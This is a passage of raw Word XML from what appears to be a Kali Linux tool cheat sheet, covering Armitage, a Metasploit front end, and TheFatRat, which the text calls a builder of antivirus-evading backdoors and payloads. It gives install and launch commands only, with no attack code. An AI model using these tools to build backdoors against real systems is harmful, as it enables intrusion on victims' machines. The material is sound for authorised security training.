              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="28A2F85A" w14:textId="77777777" w:rsidR="00F15476" w:rsidRDefault="00F15476" w:rsidP="00622B62">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0F1E5F8D" w14:textId="77777777" w:rsidR="00F15476" w:rsidRPr="001E0F42" w:rsidRDefault="00F15476" w:rsidP="00622B62"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="46E06B70" w14:textId="05A45BBE" w:rsidR="00BF3807" w:rsidRDefault="00BF3807"/>
    <w:p w14:paraId="0D604279" w14:textId="77777777" w:rsidR="00BF3807" w:rsidRDefault="00BF3807">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C387F6" w14:textId="5A9273A7" w:rsidR="00BF3807" w:rsidRPr="00F15476" w:rsidRDefault="00BF3807" w:rsidP="00BF3807">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Armitage</w:t>
      </w:r>
      <w:r w:rsidR="002C31F8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | TheFatRat</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3"/>
        <w:gridCol w:w="8023"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BF3807" w14:paraId="2D17C1C0" w14:textId="77777777" w:rsidTr="00E5148C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="74441FF6" w14:textId="32C3FAC0" w:rsidR="00BF3807" w:rsidRDefault="007118F6" w:rsidP="00E5148C">
            <w:r>
              <w:t>77</w:t>
            </w:r>
            <w:r w:rsidR="00BF3807">
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="748B2463" w14:textId="5E7C44B9" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>armitage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5AFBA897" w14:textId="0B2D51E3" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
            <w:r>
              <w:t>Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5182ED45" w14:textId="64AB3439" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
            <w:r>
              <w:t>Through one Metasploit instance, your team will:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26D55239" w14:textId="16FF68D8" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
            <w:r>
              <w:t xml:space="preserve">    +Use the same sessions</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="60C02C99" w14:textId="5F65DCCA" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
            <w:r>
              <w:t xml:space="preserve">    +Share hosts, captured data, and downloaded files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477BC5E5" w14:textId="61D425AB" w:rsidR="00520A0D" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
            <w:r>
              <w:t xml:space="preserve">    +Communicate through a shared event log.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FFEC45" w14:textId="22B60DBB" w:rsidR="00BF3807" w:rsidRDefault="00520A0D" w:rsidP="00520A0D">
            <w:r>
              <w:t xml:space="preserve">    +Run bots to automate red team tasks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3807" w14:paraId="78497B8F" w14:textId="77777777" w:rsidTr="00E5148C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="03709C73" w14:textId="359B9E91" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="122E9603" w14:textId="1942FB33" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>armitage</w:t>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E5148C" w:rsidRPr="00E5148C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(armitage isn’t installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="203DA757" w14:textId="3DC3F8E7" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C">
            <w:r>
              <w:t>Kali doesn’t seem to come installed with Armitage (on the VM version at least) but can be easily installed with:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00BF3807">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3807">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3807">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3807">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>armitage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3807" w14:paraId="7A2A4A8F" w14:textId="77777777" w:rsidTr="00E5148C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36161DAD" w14:textId="742A3AE2" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="097D5217" w14:textId="19CD1A6B" w:rsidR="00BF3807" w:rsidRDefault="00F06945" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>msfdb</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5175F3D4" w14:textId="60EFD63E" w:rsidR="00F06945" w:rsidRDefault="00F06945" w:rsidP="00E5148C">
            <w:r>
              <w:t>First of all, start the PostgreSQL Database:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="228E51CD" w14:textId="77777777" w:rsidR="00F06945" w:rsidRDefault="00F06945" w:rsidP="00E5148C">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F06945">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">systemctl </w:t>
            </w:r>
            <w:r w:rsidRPr="00F06945">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">start </w:t>
            </w:r>
            <w:r w:rsidRPr="00F06945">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>postgresql</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7485C9F0" w14:textId="10801BA4" w:rsidR="00F06945" w:rsidRDefault="00F06945" w:rsidP="00E5148C">
            <w:r>
              <w:t>Initialize the Metasploit Framework Database:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B673BE3" w14:textId="77777777" w:rsidR="00BF3807" w:rsidRDefault="00F06945" w:rsidP="00E5148C">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F06945">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>msfdb init</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Start Armitage:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F06945">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>armitage</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27C2E079" w14:textId="39AE2846" w:rsidR="00F06945" w:rsidRDefault="00F06945" w:rsidP="00E5148C">
            <w:r w:rsidRPr="00F06945">
              <w:t>Click ‘Connect’ and leave the settings in the first screen as the default, then click ‘yes’ when prompted about the Metasploit’s RPC server.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C31F8" w14:paraId="399474FE" w14:textId="77777777" w:rsidTr="00E5148C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7B0BA811" w14:textId="161E4854" w:rsidR="002C31F8" w:rsidRDefault="002C31F8" w:rsidP="00E5148C">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="093B8A0B" w14:textId="147F2502" w:rsidR="002C31F8" w:rsidRDefault="002C31F8" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>TheFatRat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="316A2924" w14:textId="651D5429" w:rsidR="002C31F8" w:rsidRDefault="002C31F8" w:rsidP="00E5148C">
            <w:r>
              <w:t xml:space="preserve">Social engineering is one of </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>hackers’</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> most typically used attacks. As recent trends suggest, many big organizations fall victim to this attack vector. The attackers trick an employee of a workplace into clicking links in a legitimate-looking document, which turns out to be malicious and can even evade anti-virus programs.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C2B70D5" w14:textId="50B905B8" w:rsidR="002C31F8" w:rsidRDefault="002C31F8" w:rsidP="00E5148C">
            <w:r>
              <w:t>TheFatRat is an exploitation tool that compiles malware with a popular payload that can then be executed on Windows, Android, and Mac OSes. The software offers an easy way to create backdoors and payloads that can bypass most anti-viruses.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C31F8" w14:paraId="003DE2B2" w14:textId="77777777" w:rsidTr="00E5148C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="2AE17645" w14:textId="28DE6424" w:rsidR="002C31F8" w:rsidRDefault="002C31F8" w:rsidP="00E5148C">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2682FBF3" w14:textId="310C2C37" w:rsidR="002C31F8" w:rsidRDefault="00E5148C" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>TheFatRat</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00E5148C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>fatrat</w:t>
            </w:r>
            <w:r w:rsidRPr="00E5148C">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> isn’t installed on Kali by default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6AACD85B" w14:textId="222BDAEB" w:rsidR="002C31F8" w:rsidRDefault="008F60BE" w:rsidP="00E5148C">
            <w:r>
              <w:t>First, ensure apt is up to date</w:t>
            </w:r>
            <w:r w:rsidR="002024F6">
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:r w:rsidR="0049162A">
              <w:t>one of its</w:t>
            </w:r>
            <w:r w:rsidR="002024F6">
              <w:t xml:space="preserve"> dependencies installed</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008F60BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="008F60BE">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidRPr="008F60BE">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
            <w:r w:rsidR="002024F6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="002024F6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="002024F6" w:rsidRPr="002024F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="002024F6" w:rsidRPr="002024F6">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidR="002024F6">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>install ming-w64</w:t>
            </w:r>
            <w:r w:rsidR="0049162A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0049162A">
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidR="0049162A" w:rsidRPr="0049162A">
              <w:t>Other dependencies will be installed automatically but ming-w64 needs a manual install.)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:t>To install, first change directory to a location where you want to save TheFatRat:</w:t>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00E5148C" w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E5148C" w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>~/Documents</w:t>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:br/>
              <w:t>Then use git clone:</w:t>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:br/>
            </w:r>
            <w:r w:rsidR="00E5148C">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008E7497" w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>git</w:t>
            </w:r>
            <w:r w:rsidR="008E7497" w:rsidRPr="008E7497">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008E7497" w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>clone</w:t>
            </w:r>
            <w:r w:rsidR="008E7497" w:rsidRPr="008E7497">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008E7497" w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/Screetsec/TheFatRat.git</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="618BB841" w14:textId="77777777" w:rsidR="008E7497" w:rsidRDefault="008E7497" w:rsidP="008E7497">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>TheFatRat</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A086CAD" w14:textId="5B73BDCD" w:rsidR="008E7497" w:rsidRDefault="008E7497" w:rsidP="008E7497">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> chmod</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">+x </w:t>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">setup.sh </w:t>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>&amp;&amp;</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008E7497">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>./setup.sh</w:t>
            </w:r>
            <w:r w:rsidR="0049162A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="0049162A" w:rsidRPr="0049162A">
              <w:t>If you are having problems, ensure all the dependencies in the list are installed, you can install many, if not all of these, manually, probably using sudo apt-get install …</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008F60BE" w14:paraId="6AEB8AB7" w14:textId="77777777" w:rsidTr="008F60BE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4968E3EA" w14:textId="053098AE" w:rsidR="008F60BE" w:rsidRDefault="008F60BE" w:rsidP="00E5148C">
            <w:r>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="007118F6">
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57FC7567" w14:textId="32C0CBDD" w:rsidR="008F60BE" w:rsidRDefault="0049162A" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>fatrat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7739D916" w14:textId="77777777" w:rsidR="008F60BE" w:rsidRDefault="0049162A" w:rsidP="00E5148C">
            <w:r>
              <w:t xml:space="preserve">Simply enter </w:t>
            </w:r>
            <w:r w:rsidRPr="0049162A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">fatrat </w:t>
            </w:r>
            <w:r>
              <w:t>once the tool has been installed. Press enter once on the red banner warning screen and once more on the green and blue server running banner.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B30D1C1" w14:textId="59458E6F" w:rsidR="001E46D6" w:rsidRDefault="001E46D6" w:rsidP="00E5148C">
            <w:r>
              <w:t>Then you will be presented with a list of options and the rest of the module is fairly straight-forward to use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BF3807" w14:paraId="1AC74F60" w14:textId="77777777" w:rsidTr="00E5148C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1BA538BF" w14:textId="77777777" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2393" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2C7EBCB2" w14:textId="77777777" w:rsidR="00BF3807" w:rsidRDefault="00BF3807" w:rsidP="00E5148C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8023" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1519D32E" w14:textId="77777777" w:rsidR="00BF3807" w:rsidRPr="001E0F42" w:rsidRDefault="00BF3807" w:rsidP="00E5148C"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A60FBB0" w14:textId="77777777" w:rsidR="00C3613A" w:rsidRDefault="00C3613A"/>
    <w:p w14:paraId="3D9C8B16" w14:textId="77777777" w:rsidR="00C3613A" w:rsidRDefault="00C3613A">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="797E3A2C" w14:textId="17BA8EE5" w:rsidR="00C3613A" w:rsidRDefault="00C3613A" w:rsidP="00C3613A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
